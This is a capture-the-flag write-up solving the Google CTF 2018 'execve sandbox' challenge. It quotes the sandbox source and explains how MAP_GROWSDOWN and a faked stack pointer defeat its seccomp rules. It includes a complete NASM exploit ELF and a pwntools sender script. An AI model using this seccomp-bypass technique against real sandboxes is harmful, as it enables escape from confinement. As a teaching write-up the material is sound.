EXECVE SANDBOX - Google CTF 2018

by abiondo, andreafioraldi, pietroborrello

What a kewl sandbox! Seccomp makes it impossible to execute ./flag

The sandbox reads a 64-bit binary from us and executes it in a temporary folder.

But this is not so easy.

First of all, the ELF is parsed with LIEF and checked:

```c
static int elf_check(const char *filename, unsigned long mmap_min_addr)
{
    Elf_Binary_t *elf_binary = elf_parse(filename);
    if (elf_binary == NULL) {
        warnx("failed to parse ELF binary");
        return -1;
    }

    Elf_Header_t header = elf_binary->header;
    uint8_t *identity = header.identity;
    int ret = 0;

    if (identity[EI_CLASS] != ELFCLASS64) {
        warnx("invalid ELF class \"%s\"", ELF_CLASS_to_string(identity[EI_CLASS]));
        ret = -1;
        goto out;
    }

    /* note: the checks below compare against mmap_min_addr + PAGE_SIZE,
       i.e. the original mmap_min_addr + 2 * PAGE_SIZE */
    mmap_min_addr += PAGE_SIZE;

    unsigned int i;
    Elf_Section_t** sections = elf_binary->sections;
    for (i = 0; i < header.numberof_sections; ++i) {
        Elf_Section_t* section = sections[i];
        if (section == NULL) {
            warnx("invalid section %d", i);
            ret = -1;
            goto out;
        }
        if (section->virtual_address != 0 &&
            section->virtual_address < mmap_min_addr + PAGE_SIZE) {
            warnx("invalid section \"%s\" (0x%lx)", section->name,
                  section->virtual_address);
            ret = -1;
            goto out;
        }
    }

    Elf_Segment_t** segments = elf_binary->segments;
    for (i = 0; segments[i] != NULL; ++i) {
        Elf_Segment_t* segment = segments[i];
        if (segment->virtual_address != 0 &&
            segment->virtual_address < mmap_min_addr + PAGE_SIZE) {
            warnx("invalid segment (0x%lx)", segment->virtual_address);
            ret = -1;
            goto out;
        }
    }

out:
    elf_binary_destroy(elf_binary);
    return ret;
}
```
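The address test in the two loops can be modelled in a few lines of Python. This is only a sketch and is not part of the challenge. It assumes 4 KiB pages and mmap_min_addr = 0x10000 (the value our final exploit relies on). It mirrors only the section/segment address check, not the ELF class check.

```python
PAGE_SIZE = 0x1000        # assumption: 4 KiB pages (x86-64)
MMAP_MIN_ADDR = 0x10000   # assumption: vm.mmap_min_addr on the server


def vaddr_passes_elf_check(vaddr: int, mmap_min_addr: int = MMAP_MIN_ADDR) -> bool:
    """Mirror the per-section / per-segment address test of elf_check()."""
    mmap_min_addr += PAGE_SIZE  # elf_check() bumps its local copy first...
    # ...and then rejects any non-zero address below mmap_min_addr + PAGE_SIZE.
    return vaddr == 0 or vaddr >= mmap_min_addr + PAGE_SIZE


for vaddr in (0x0, 0x10000, 0x11000, 0x12000, 0x400000):
    print(hex(vaddr), vaddr_passes_elf_check(vaddr))
# 0x0 True
# 0x10000 False
# 0x11000 False
# 0x12000 True
# 0x400000 True
```

Under these assumptions, the lowest non-zero address a section or segment may start at is 0x12000, two pages above mmap_min_addr.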

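As we can see, the ELF must be 64-bit. Each of its segments must either have address 0 or start at or above mmap_min_addr + 2 * PAGE_SIZE, and so must each section (we don't know why sections are checked too; maybe some PIE magic was possible). The factor of two comes from the function incrementing its local copy of mmap_min_addr by PAGE_SIZE before comparing against mmap_min_addr + PAGE_SIZE. Then, before executing the ELF, some seccomp rules are added: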

```c
static int install_syscall_filter(unsigned long mmap_min_addr)
{
    int allowed_syscall[] = {
        SCMP_SYS(rt_sigreturn),
        SCMP_SYS(rt_sigaction),
        SCMP_SYS(rt_sigprocmask),
        SCMP_SYS(sigreturn),
        SCMP_SYS(exit_group),
        SCMP_SYS(exit),
        SCMP_SYS(brk),
        SCMP_SYS(access),
        SCMP_SYS(fstat),
        SCMP_SYS(write),
        SCMP_SYS(close),
        SCMP_SYS(mprotect),
        SCMP_SYS(arch_prctl),
        SCMP_SYS(munmap),
        SCMP_SYS(fstat),
        SCMP_SYS(readlink),
        SCMP_SYS(uname),
    };
    scmp_filter_ctx ctx;
    unsigned int i;
    int ret;

    /* default action: kill the process on any syscall not explicitly allowed */
    ctx = seccomp_init(SCMP_ACT_KILL);
    if (ctx == NULL) {
        warn("seccomp_init");
        return -1;
    }

    /* unconditionally allow the syscalls listed above */
    for (i = 0; i < sizeof(allowed_syscall) / sizeof(int); i++) {
        if (seccomp_rule_add(ctx, SCMP_ACT_ALLOW, allowed_syscall[i], 0) != 0) {
            warn("seccomp_rule_add");
            ret = -1;
            goto out;
        }
    }
```

This whitelists a handful of system calls (note that neither open nor read is among them), but unfortunately none of them is useful to us. Then comes the interesting part, which is supposed to prevent us from executing ./flag:

```c
    /* prevent mmap to map mmap_min_addr */
    if (seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(mmap), 1,
                         SCMP_A0(SCMP_CMP_GE, mmap_min_addr + PAGE_SIZE)) != 0) {
        warn("seccomp_rule_add");
        ret = -1;
        goto out;
    }

    /* first execve argument (filename) must be mapped at mmap_min_addr */
    if (seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(execve), 1,
                         SCMP_A0(SCMP_CMP_EQ, mmap_min_addr)) != 0) {
        warn("seccomp_rule_add");
        ret = -1;
        goto out;
    }
```

These rules are tricky, but in essence they allow execve only if its first argument (the filename pointer) is exactly mmap_min_addr. At the same time, they allow mmap only when the requested address is at least mmap_min_addr + PAGE_SIZE. Therefore it seems impossible to place the filename where execve wants it, and thus impossible to execute any binary.
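The two conditional rules can be restated as Python predicates to make the contradiction explicit. This is a sketch that assumes mmap_min_addr = 0x10000 and 4 KiB pages. seccomp compares arguments as unsigned 64-bit values; plain non-negative Python ints behave the same way for the addresses used here.

```python
PAGE_SIZE = 0x1000        # assumption: 4 KiB pages
MMAP_MIN_ADDR = 0x10000   # assumption: vm.mmap_min_addr on the server


def mmap_allowed(addr: int) -> bool:
    """SCMP_A0(SCMP_CMP_GE, mmap_min_addr + PAGE_SIZE) on mmap's first argument."""
    return addr >= MMAP_MIN_ADDR + PAGE_SIZE


def execve_allowed(filename_ptr: int) -> bool:
    """SCMP_A0(SCMP_CMP_EQ, mmap_min_addr) on execve's first argument."""
    return filename_ptr == MMAP_MIN_ADDR


print(execve_allowed(0x10000))  # True: the only filename pointer execve accepts
print(mmap_allowed(0x10000))    # False: that page cannot be requested from mmap
print(mmap_allowed(0x11000))    # True: the lowest address mmap accepts
print(mmap_allowed(0))          # False: even mmap(NULL, ...) is filtered out
```

A call that matches no rule falls back to the default SCMP_ACT_KILL action, so a plain mmap(NULL, ...) kills the process too.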

After reading the mmap man page, we came across an interesting flag:

> MAP_GROWSDOWN
>
> This flag is used for stacks. It indicates to the kernel virtual memory system that the mapping should extend downward in memory. The return address is one page lower than the memory area that is actually created in the process's virtual address space. Touching an address in the "guard" page below the mapping will cause the mapping to grow by a page. This growth can be repeated until the mapping grows to within a page of the high end of the next lower mapping, at which point touching the "guard" page will result in a SIGSEGV signal.

So our first idea was to map a page at mmap_min_addr + PAGE_SIZE (the lowest address the filter allows) with the MAP_GROWSDOWN flag. We would then access mmap_min_addr, which lies in the guard page just below it.

Since the guard page is touched, the documentation says the kernel should map that page for us. Apparently, though, the documentation is incomplete, and the flag alone is not enough to make the mechanism work, as we discovered later.
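The numbers behind this plan can be checked with a little arithmetic. In the sketch below, the constants are hardcoded with their Linux x86-64 values, and mmap_min_addr = 0x10000 and 4 KiB pages are assumptions. The resulting flags value is the 306 used in our final exploit.

```python
# Linux x86-64 values of the mmap constants (from the kernel's UAPI mman headers).
PROT_READ = 0x1
PROT_WRITE = 0x2
MAP_PRIVATE = 0x02
MAP_FIXED = 0x10
MAP_ANONYMOUS = 0x20
MAP_GROWSDOWN = 0x100

PAGE_SIZE = 0x1000        # assumption: 4 KiB pages
MMAP_MIN_ADDR = 0x10000   # assumption: vm.mmap_min_addr on the server

prot = PROT_READ | PROT_WRITE
flags = MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED | MAP_GROWSDOWN
map_addr = MMAP_MIN_ADDR + PAGE_SIZE   # lowest address the seccomp filter lets us pass
guard_page = map_addr - PAGE_SIZE      # the page we then touch: exactly mmap_min_addr

print(prot, flags, hex(map_addr), hex(guard_page))  # 3 306 0x11000 0x10000
```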

While trying to make MAP_GROWSDOWN work, we also explored other approaches. Here is a short list of the ideas we came up with:

| Idea | Why it didn't work |
|---|---|
| Use brk(0x10000) to move the program break to the target | Unfortunately, brk() only allows contiguous allocation. |
| Use MAP_HUGETLB to allocate a page larger than PAGE_SIZE at mmap_min_addr + PAGE_SIZE + 1, hoping it would be aligned back down to mmap_min_addr | By default most systems deny huge page allocations, and the server was no exception. |
| Use sbrk(0x10000 - sbrk(0)) to move the program break to the target | Moving the program break would have allocated the whole contiguous area in between; unfortunately, a negative increment to sbrk() only releases memory instead of allocating it. |
| Exploit a race condition: send a binary with lots of sections to keep the LIEF check running, and in parallel run another quick binary that mmaps the first file (its temporary location was printed on stdout) and changes its data section address after the check | Hard, but I think it could have worked if only we had had open(). |
| Place the data segment at address 0x0 (which passes the check) and let it grow up to 0x10000 | Memory areas at program startup are mapped with mmap, so any mapping below mmap_min_addr fails. |
| Pass a PIE binary and try to get it loaded at 0x10000; it would pass the checks since its segment address would be 0x0 | I still believe the idea could work, but we didn't manage to make it work. |
| mmap() the whole address space starting from mmap_min_addr + PAGE_SIZE + 1 (using MAP_32BIT to restrict it), so that the kernel would eventually pick mmap_min_addr as the last page for us | Our implementations never wrapped around into mmap_min_addr. We thought that, due to ASLR, mmap() never wrapped around past the mmap_base address before returning -1, so we couldn't map the whole address space without MAP_FIXED. |

The length of this table should give an idea of our frustration at not getting MAP_GROWSDOWN to work. After giving up on all the other alternatives, we concluded that making MAP_GROWSDOWN work was our only escape from eternal damnation.

So we dusted off our kernel-reading skillz and started investigating how the whole mechanism was supposed to work.



As we know, every time a process touches memory that is not currently backed by a page (including the copy-on-write and lazy physical allocation cases), the kernel's page fault handler, __do_page_fault, is called.

Since MAP_GROWSDOWN (according to the documentation) should expand the mapping when the unallocated guard page is touched, __do_page_fault was exactly the right place to examine.

As we could run code on the server anyway, the first thing we did was send an ELF that calls uname() (one of the whitelisted syscalls) to learn the exact kernel version to read.
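On a machine you control, the same information is one call away in Python. This is not the probe we sent: the sandbox only runs ELF binaries, so our probe issued the uname syscall directly. It is a small sketch built on os.uname() (a wrapper around uname(2), available on Unix only), plus a hypothetical helper, kernel_major_minor, that extracts the major and minor version from a release string. The string "4.13.0-36-generic" is illustrative, not the server's actual output.

```python
import os
import re


def kernel_major_minor(release: str) -> tuple:
    """Hypothetical helper: extract (major, minor) from a kernel release string."""
    m = re.match(r"(\d+)\.(\d+)", release)
    if m is None:
        raise ValueError(f"unrecognised kernel release: {release!r}")
    return int(m.group(1)), int(m.group(2))


# os.uname() is a thin wrapper around the uname(2) system call.
info = os.uname()
print(info.sysname, info.release, info.machine)
print(kernel_major_minor("4.13.0-36-generic"))  # (4, 13)
```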

Running that ELF, we discovered that the server was running Linux 4.13, and in arch/x86/mm/fault.c we found our function:

```c
__do_page_fault(struct pt_regs *regs, unsigned long error_code,
                unsigned long address)
```

Before digging into the code, let's take a look at "Understanding the Linux Kernel", which provides a great diagram of the page fault handler (written for v2.6, but still valid).

Remember that we are accessing an unmapped memory region (the guard page) from user space and failing with a SIGSEGV, so let's examine the flow.

Now we can see where we went wrong: we fail the check "Address could belong to User Mode stack?". To find out why (even if by now we could guess), let's look at the kernel code:

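```c
if (error_code & PF_USER) {
    /*
     * A user-mode fault more than 64 KiB + 32 words below the current
     * stack pointer is treated as a bug, not as stack growth.
     */
    if (unlikely(address + 65536 + 32 * sizeof(unsigned long) < regs->sp)) {
        bad_area(regs, error_code, address);
        return;
    }
}
if (unlikely(expand_stack(vma, address))) {
    bad_area(regs, error_code, address);
    return;
}
```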

So if we avoid bad_area(), expand_stack() is executed, and it maps our memory region by calling expand_downwards() on the faulting address.

So setting rsp just above the faulting address (no more than 64 KiB + 256 bytes above it) makes the access look like a user-mode stack access. A single mov rsp, 0x10100 was all our initial code was missing!
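The effect of that one instruction can be seen by evaluating the kernel condition quoted above for both stack pointers. This sketch models only that check, with sizeof(unsigned long) = 8 on x86-64. The "original" rsp value is a hypothetical, typical user stack address. In the real handler this path is reached only for a fault just below a VM_GROWSDOWN mapping, and expand_stack() can still fail for other reasons that the sketch ignores.

```python
WORD = 8  # sizeof(unsigned long) on x86-64


def stack_fault_rejected(address: int, sp: int) -> bool:
    """User-mode test in __do_page_fault() (Linux 4.13) before expand_stack() is tried."""
    return address + 65536 + 32 * WORD < sp


fault_addr = 0x10000           # mov qword [0x10000], rax: inside the guard page
original_sp = 0x7FFC00000000   # hypothetical: a typical initial user stack pointer
print(stack_fault_rejected(fault_addr, original_sp))  # True: bad_area(), SIGSEGV
print(stack_fault_rejected(fault_addr, 0x10100))      # False: expand_stack() runs
print(hex(fault_addr + 65536 + 32 * WORD))            # 0x20100, highest rsp that still works
```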

So our final ELF will be:

```nasm
BITS 64
org 0x400000

ehdr:                               ; Elf64_Ehdr
    db 0x7f, "ELF", 2, 1, 1, 0      ; e_ident: magic, ELFCLASS64, little-endian, version 1, SysV ABI
    times 8 db 0                    ;          padding up to 16 bytes
    dw 2                            ; e_type      = ET_EXEC
    dw 0x3e                         ; e_machine   = EM_X86_64
    dd 1                            ; e_version
    dq _start                       ; e_entry
    dq phdr - $$                    ; e_phoff
    dq 0                            ; e_shoff     (no section headers)
    dd 0                            ; e_flags
    dw ehdrsize                     ; e_ehsize
    dw phdrsize                     ; e_phentsize
    dw 1                            ; e_phnum
    dw 0                            ; e_shentsize
    dw 0                            ; e_shnum
    dw 0                            ; e_shstrndx
ehdrsize equ $ - ehdr

phdr:                               ; Elf64_Phdr
    dd 1                            ; p_type   = PT_LOAD
    dd 5                            ; p_flags  = PF_R | PF_X
    dq 0                            ; p_offset
    dq $$                           ; p_vaddr  = 0x400000, well above the elf_check limit
    dq $$                           ; p_paddr
    dq filesize                     ; p_filesz
    dq filesize                     ; p_memsz
    dq 0x1000                       ; p_align
phdrsize equ $ - phdr

_start:
    mov rax, 9                      ; mmap
    mov rdi, 0x11000                ; addr  = mmap_min_addr + PAGE_SIZE, lowest address seccomp allows
    mov rsi, 4096                   ; size  = 4096
    mov rdx, 3                      ; prot  = PROT_READ | PROT_WRITE
    mov r10, 306                    ; flags = MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED | MAP_GROWSDOWN
    xor r8, r8                      ; fd    = -1
    dec r8
    xor r9, r9                      ; off   = 0
    syscall

    mov rax, qword [filename]       ; load 8 bytes at filename: "./flag", NUL and the next byte
    mov r10, rsp                    ; keep the original stack pointer (not used afterwards)
    mov rsp, 0x10100                ; fake a stack just above the guard page
    mov qword [0x10000], rax        ; touch the guard page: the mapping grows down to 0x10000

    mov rax, 59                     ; execve
    mov rdi, 0x10000                ; filename = mmap_min_addr, as the seccomp rule requires
    push 0
    mov rdx, rsp                    ; envp = {0}
    push 0x10000
    mov rsi, rsp                    ; argv = {0x10000, 0}
    syscall

filename db "./flag"
    db 0

filesize equ $ - $$
```
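The tail of _start builds the filename, argv and envp entirely inside the freshly grown page. A tiny Python replay of those instructions makes the resulting layout visible. It is a sketch that models memory as a dictionary of 8-byte words. It assumes the byte after the NUL terminator reads as 0, though the string is NUL-terminated either way.

```python
PAGE_LO, PAGE_HI = 0x10000, 0x11000  # page added below the MAP_GROWSDOWN mapping


def simulate_execve_setup(start_rsp: int = 0x10100):
    """Replay the tail of _start on a sparse memory model (address -> qword)."""
    mem = {}
    rsp = start_rsp

    def push(value: int) -> None:
        nonlocal rsp
        rsp -= 8
        mem[rsp] = value

    # mov rax, qword [filename] / mov qword [0x10000], rax
    mem[0x10000] = int.from_bytes(b"./flag\x00\x00", "little")
    rdi = 0x10000          # filename
    push(0)
    rdx = rsp              # envp -> {NULL}
    push(0x10000)
    rsi = rsp              # argv -> {0x10000, NULL}
    return mem, rdi, rsi, rdx


mem, rdi, rsi, rdx = simulate_execve_setup()
print(hex(rdi), hex(rsi), hex(rdx))                      # 0x10000 0x100f0 0x100f8
print(hex(mem[rsi]), mem[rsi + 8], mem[rdx])             # 0x10000 0 0
print(mem[rdi].to_bytes(8, "little").split(b"\x00")[0])  # b'./flag'
```

Every address touched lies between 0x10000 and 0x10100, so the single page created by the stack expansion is enough.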

We compile flagger.asm with:

```
$ nasm -f bin -o flagger flagger.asm
```
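Since the ELF is hand-written, a quick sanity check of the assembled headers can save a round trip to the server. The sketch below is not part of our exploit. It decodes the Elf64_Ehdr and the first Elf64_Phdr with the standard struct module; the helper name describe_elf is our own.

```python
import struct

EHDR = struct.Struct("<16sHHIQQQIHHHHHH")  # Elf64_Ehdr (64 bytes)
PHDR = struct.Struct("<IIQQQQQQ")          # Elf64_Phdr (56 bytes)
PT_LOAD = 1


def describe_elf(data: bytes) -> dict:
    """Decode the ELF header and the first program header of a small static ELF."""
    (ident, e_type, e_machine, _version, e_entry, e_phoff, _shoff, _flags,
     e_ehsize, e_phentsize, e_phnum, _shentsize, e_shnum, _shstrndx) = EHDR.unpack_from(data, 0)
    if ident[:4] != b"\x7fELF" or ident[4] != 2:  # magic + ELFCLASS64
        raise ValueError("not a 64-bit ELF file")
    (p_type, p_flags, _offset, p_vaddr, _paddr,
     p_filesz, p_memsz, _align) = PHDR.unpack_from(data, e_phoff)
    return {
        "type": e_type, "machine": e_machine, "entry": e_entry,
        "ehsize": e_ehsize, "phentsize": e_phentsize,
        "phnum": e_phnum, "shnum": e_shnum,
        "load": p_type == PT_LOAD, "flags": p_flags,
        "vaddr": p_vaddr, "filesz": p_filesz, "memsz": p_memsz,
    }
```

For example, `describe_elf(open("flagger", "rb").read())` should report a single PT_LOAD segment at 0x400000, no sections, and an entry point of 0x400078 (0x400000 plus the 64-byte ELF header and the 56-byte program header).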

The resulting flagger binary is then sent to the server with:

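```python
#!/usr/bin/env python3
import sys

from pwn import *

assert len(sys.argv) > 1, "usage: run.py <elf-file>"

with open(sys.argv[1], 'rb') as f:
    payload = f.read()

p = remote('execve-sandbox.ctfcompetition.com', 1337)
p.recvuntil(b'[*] waiting for an ELF binary...')
# "deadbeef" follows the ELF; presumably the sandbox uses it as the end-of-upload marker
p.send(payload + b'deadbeef')
p.interactive()
```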

Running the script gives us our beloved flag!

CTF{Time_to_read_that_underrated_Large_Memory_Management_Vulnerabilities_paper}

The zip file linked below contains the execve-sandbox.c source code, the execve-sandbox binary, the libLIEF.so library needed to run execve-sandbox, the full exploit (flagger.asm) and the run.py script.

Attachment: https://drive.google.com/file/d/1RbE5jM5aG8phRHA7s6–fbF4chsGMBpg/view?usp=sharing

tags: google - ctf - pwn - mhackeroni